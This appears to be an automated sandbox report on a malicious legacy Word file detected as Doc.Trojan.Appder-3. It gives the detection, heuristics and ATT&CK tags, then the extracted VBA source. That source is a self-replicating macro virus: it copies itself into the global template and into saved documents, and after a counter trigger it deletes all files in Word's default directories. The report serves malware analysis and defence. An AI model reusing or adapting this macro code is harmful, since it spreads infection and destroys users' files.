MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing both AutoOpen and AutoClose VBA macros, indicating an attempt to execute code upon document interaction. The macro code attempts to modify the WINWORD6.INI file and potentially delete files, suggesting downloader or dropper functionality. The presence of legacy WordBasic functions and the 'Virus Infected Bait File' text further supports malicious intent.
Heuristics (5)
- ClamAV: Doc.Trojan.Appder-3 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Appder-3
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Auto_Close macro [high] OLE_VBA_AUTOCLOSE: Auto_Close macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9345 bytes |

SHA-256: 987a51ce200123ad65fe48866712bcedfc2e0ae2f944c2b6ac072cbb422abca5
Detection: ClamAV: Doc.Trojan.Appder-3
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "SVGA"
Private Sub SD()
Dim DigitC$
Dim digit
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI ")
digit = WordBasic.Val(DigitC$) + 1
WordBasic.SetPrivateProfileString "Microsoft Word", "VERMIN", Str(digit), "WINWORD6.INI"
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "VERMIN", "WINWORD6.INI")
If DigitC$ = "3" Then
WordBasic.SetPrivateProfileString "Microsoft Word", "VERMIN", "1", "WINWORD6.INI"
DigitC$ = WordBasic.[DefaultDir$](10) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](11) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](12) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](15) + "\*.*"
WordBasic.Kill DigitC$
End If
End Sub 'SD
Public Sub MAIN()
Dim MCS
Dim op
Dim ACLS
Dim Automatical
Dim sMacro$
Dim DigitC$
Dim yesno
On Error GoTo -1: On Error GoTo No
MCS = WordBasic.CountMacros(0, 0)
For op = 1 To MCS
If WordBasic.[MacroName$](op, 0, 0) = "AutoClose" Then
ACLS = -1
End If
If WordBasic.[MacroName$](op, 0, 0) = "SVGA" Then
Automatical = -1
End If
Next op
If Not ACLS And Not Automatical Then
sMacro$ = WordBasic.[FileName$]() + ":SVGA"
WordBasic.MacroCopy sMacro$, "Global:SVGA"
sMacro$ = WordBasic.[FileName$]() + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:AutoClose"
End If
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI")
yesno = WordBasic.Val(DigitC$)
If Not yesno Then
SD
End If
No:
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Dim ParaMacro$
Dim WOpen$
Dim yesno
Dim Dialogues As Object: Set Dialogues = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo No
WordBasic.CurValues.FileSaveAs Dialogues
If Dialogues.Format = 0 Then Dialogues.Format = 1
ParaMacro$ = WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:SVGA", ParaMacro$
ParaMacro$ = WordBasic.[FileName$]() + ":SVGA"
WordBasic.MacroCopy "Global:SVGA", ParaMacro$
ParaMacro$ = WordBasic.[FileName$]() + ":AutoClose"
WordBasic.MacroCopy "Global:AutoClose", ParaMacro$
WordBasic.FileSaveAs Dialogues
GoTo Yes
No:
If Err.Number <> 102 Then
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI")
yesno = WordBasic.Val(WOpen$)
If Not yesno Then
WordBasic.FileSaveAs Dialogues
End If
End If
Yes:
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/60fc8450bdff4597ade9a532373de97d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoClose - 2798 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn ParaMacro
' Line #3:
' Dim
' VarDefn WOpen
' Line #4:
' Dim
' VarDefn yesno
' Line #5:
' Dim
' VarDefn Dialogues (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set Dialogues
' Line #6:
' OnError <crash>
' BoS 0x0000
' OnError No
' Line #7:
' Ld Dialogues
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #8:
' Line #9:
' Ld Dialogues
' MemLd Format$
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' Ld Dialogues
' MemSt Format$
' EndIf
' Line #10:
' Line #11:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0009 ":AutoOpen"
' Add
' St ParaMacro$
' Line #12:
' LitStr 0x000B "Global:SVGA"
' Ld ParaMacro$
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #13:
' Ld WordBa
... (truncated)